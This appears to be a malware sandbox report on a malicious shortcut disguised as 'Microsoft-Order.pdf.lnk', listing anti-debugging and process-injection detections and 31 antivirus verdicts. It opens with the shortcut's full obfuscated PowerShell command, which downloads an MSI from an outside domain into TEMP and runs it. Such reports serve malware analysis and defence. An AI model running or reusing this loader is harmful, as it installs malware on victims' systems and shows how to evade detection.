"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (' '+'(Vuq2qBsoVuq+VuqmeDatVuq+Vuqa =Vuq+Vuq @(Vuq+Vuq Vuq+Vuq Vuq+Vuq[Vuq+VuqPSCV'+'uq+VuqustomObjeVuq+Vuqct'+'Vuq'+'+Vuq]@{a = Vuq+Vuqb'+'m6Vuq+VuqhtVuq+VuqtpVuq+Vuqs://goVuq+Vuq-cVuq+VuqaVuq+VuqrVuq+Vuqs-chVuq+VuqeapVuq+VuqrestVuq+Vuq.cfd/UVuq+VuqXVR'+'UZ'+'MQ.msibm6Vuq'+'+Vuq; b = bm6filVuq+VuqeVuq+Vuq8dd75fVuq+Vuq5Vuq+Vuq7e41a2f8.msibmVuq+Vuq6Vuq+Vuq}'+' ); foreachVuq+Vuq (2qVuq+VuqBi in 2qBsomeData) { Vuq+VuqtryVuq+Vuq {Vuq+Vuq Vu'+'q+Vuq 2qBfilePaVuq+VuqtVuq+Vuqh Vuq+Vuq= Vuq+Vuq'+'bm62qBenv:TEMPdH52qBVuq+Vuq(Vuq+Vuq2qBi.b)bm6; Vuq+Vuq 2qB'+'doVuq+Vuqwnload = 2Vuq+VuqqBVuq+VuqtrVuq+Vuque; Vuq+Vuq'+' iVuq+VuqfVuq+Vuq Vuq+Vuq(TVuq+Vuqest-Vuq+VuqPath Vuq+Vuq2Vuq+VuqqBfileVuq+VuqPathVuq+Vuq) Vuq+Vuq{Vuq+Vuq Vuq+Vuq 2qVuq+VuqBVuq+VuqdowVuq+VuqnloVuq+Vuqad =Vuq+Vuq 2qBfalseVuq+Vuq; Vuq+Vuq } if (2qBVuq+'+'Vuqdownload) { Vuq+Vuq'+' Vuq+Vuq Vuq+Vuq '+'Invoke-Vuq+VuqRestMethodVuq'+'+Vuq -Vuq+VuqUriVuq+Vuq Vuq+Vuq2qBi.Vuq+Vu'+'qa -OutFile 2qBfilVuq+V'+'uqePath; Vuq+Vuq } Vuq'+'+Vuq Vuq+VuqSVuq+Vuqtart-Proc'+'Vuq+Vuqess 2qBfilePath; Vuq+Vuq } cVu'+'q+VuqaVuq+VuqtVuq+VuqcVuq+Vuqh { Vuq+Vuq } Vuq+Vuq } Vuq).REPlaCE(VuqdH5Vu'+'q,[STrInG][cHAr]92).REPlaCE(([cHAr]50+[cHAr]113+[cHAr]66),Vuq0aXVuq).REPl'+'aCE(Vuqbm6Vuq,[STrInG][cHAr]34)'+'Vnq iEX').rEplACE('Vuq',[strInG][ChAR]39).rEplACE(([ChAR]48+[ChAR]97+[ChAR]88),[strInG][ChAR]36).rEplACE(([ChAR]86+[ChAR]110+[ChAR]113),'|')| &( $ENv:COmSpeC[4,15,25]-joIn'')

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 9, 2025, 9:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1648 resumed a thread in remote process 2148
NtResumeThread April 9, 2025, 9:58 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2148	1	0	0

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Lionic	Trojan.WinLNK.Boxter.4!c
CTX	lnk.trojan.generic
Skyhigh	BehavesLike.Trojan.zx
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Heur.BZC.YAX.Boxter.32.CF498C11
Sangfor	Trojan.Generic-LNK.Save.ea288cc4
Arcabit	Heur.BZC.YAX.Pantera.228.CF498C11
Symantec	Scr.Malcode!gen
TrendMicro-HouseCall	LNK_ARGULONG.SMLNK
Avast	LNK:Agent-KJ [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecom.a
BitDefender	Heur.BZC.YAX.Pantera.228.CF498C11
MicroWorld-eScan	Heur.BZC.YAX.Pantera.228.CF498C11
Rising	Trojan.PSRunner/LNK!1.BADE (CLASSIC)
Emsisoft	Heur.BZC.YAX.Pantera.228.CF498C11 (B)
F-Secure	Trojan:W32/LnkGen.C
TrendMicro	LNK_ARGULONG.SMLNK
Sophos	Mal/PowLnkObf-A
SentinelOne	Static AI - Suspicious LNK
Google	Detected
Microsoft	Trojan:Script/Wacatac.B!ml
ZoneAlarm	Mal/PowLnkObf-A
GData	Heur.BZC.YAX.Pantera.228.CF498C11
AhnLab-V3	LNK/Runner.S1
McAfee	Artemis!8B68173E0F54
VBA32	Trojan.Link.ShellCmd
Ikarus	BZC.YAX.Boxter
Zoner	Probably Heur.LNKScript
huorong	TrojanDownloader/LNK.Agent.fg
AVG	LNK:Agent-KJ [Trj]
alibabacloud	Trojan:Multi/Wacatac.B9nj

Microsoft-Order.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All